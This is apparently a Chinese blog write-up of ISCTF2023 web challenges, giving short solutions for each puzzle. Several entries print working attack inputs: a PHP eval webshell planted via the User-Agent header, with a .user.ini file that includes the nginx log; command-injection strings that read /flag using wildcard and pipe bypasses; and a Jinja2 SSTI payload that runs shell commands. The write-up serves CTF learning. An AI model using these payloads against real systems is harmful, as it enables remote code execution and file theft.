当前位置: 首页 > article >正文

[WP] ISCTF2023 Web 部分题解

圣杯战争!!!

反序列化+伪协议读取

 where_is_the_flag

环境变量+根目录+当前目录

绕进你的心里

利用正则最大回溯绕过

easy_website

or select 用双写绕过 空格用/**/绕,报错注入

wafr 

code=system('ca\t /f*')

webinclude 

扫描得到index.bak备份文件打开为加密的代码 写个逆向脚本再反求parameter即可

JavaScript
const hash = 'dxdydxdudxdtdxeadxekdxea';

function string_to_int_array(str) {
  const intArr = [];
  for (let i = 0; i < str.length; i++) {
    intArr.push(str.charCodeAt(i) - 97);
  }
  return intArr;
}

function int_array_to_string(int_array) {
  let str = '';
  for (let i = 0; i < int_array.length; i += 2) {
    const charcode = int_array[i] * 26 + int_array[i + 1];
    str += String.fromCharCode(charcode);
  }
  return str;
}

console.log(int_array_to_string(string_to_int_array(int_array_to_string(string_to_int_array(hash)))));

得到参数名 直接伪协议读取flag.php 

ez_ini

ini文件上传 +UA头添加木马

.user.ini 文件:

GIF89A
auto_append_file="/var/log/nginx/access.log"

木马: 

<?php @eval($_POST['wenda']);?

然后远程命令执行就行了

POST:

wenda=system('tac /flag');

 注意一下上传ini文件的时候 type类型要改成image/jpeg 或者/image/png 类型】

或者直接ini 文件直接读取file:///flag 就行

auto_prepend_file=file:///flag

fuzz!

通配符【】绕过 字符过滤 管道符| 拼接命令

?file=|tac /fl[a-z]ggggggg.txt

恐怖G7

ssti注入:

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}

 


http://www.kler.cn/a/156047.html

相关文章:

  • 完整培训教程:骨折图像分割
  • 物联网技术及其在智慧城市中的应用
  • <项目代码>YOLOv8 苹果腐烂识别<目标检测>
  • Sharding运行模式、元数据、持久化详解
  • uniapp中使用全局样式文件引入的三种方式
  • Visa指令简介
  • Amazon CodeWhisperer 使用体验
  • 6-55.汽车类的继承
  • Cmkae外部依赖管理
  • qt5.15播放音频示例(4种方法)
  • 【开源】基于Vue.js的智慧社区业务综合平台
  • Python网络爬虫练习
  • Ubuntu系统配置深度学习环境之nvidia显卡驱动和cuda安装
  • 【算法】滑动窗口题单——5.多指针滑动窗口醒醒⭐
  • vue el-radio-group多选封装及使用
  • pytorch 中的dim 的作用范围
  • Promise自定义封装
  • react native 环境准备
  • 三极管在数字电路中的应用
  • PyQt6 QToolButton工具按钮控件
  • Nacos源码解读04——服务发现
  • linux 内核regulator
  • 记录 | linux查看文件夹大小
  • 【c++随笔15】c++常用第三方库
  • 浅学指针(5)sizeof和strlen的进阶理解
  • k8s安装步骤